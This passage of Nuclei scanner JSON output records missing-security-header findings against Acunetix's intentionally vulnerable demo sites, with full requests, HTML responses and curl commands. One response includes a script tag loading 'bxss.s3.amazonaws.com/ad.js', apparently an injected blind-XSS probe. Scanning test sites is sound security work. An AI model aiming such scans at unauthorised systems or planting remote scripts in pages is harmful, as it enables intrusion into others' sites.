gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:19.755961199Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:19.755925848Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:20.057014493Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan 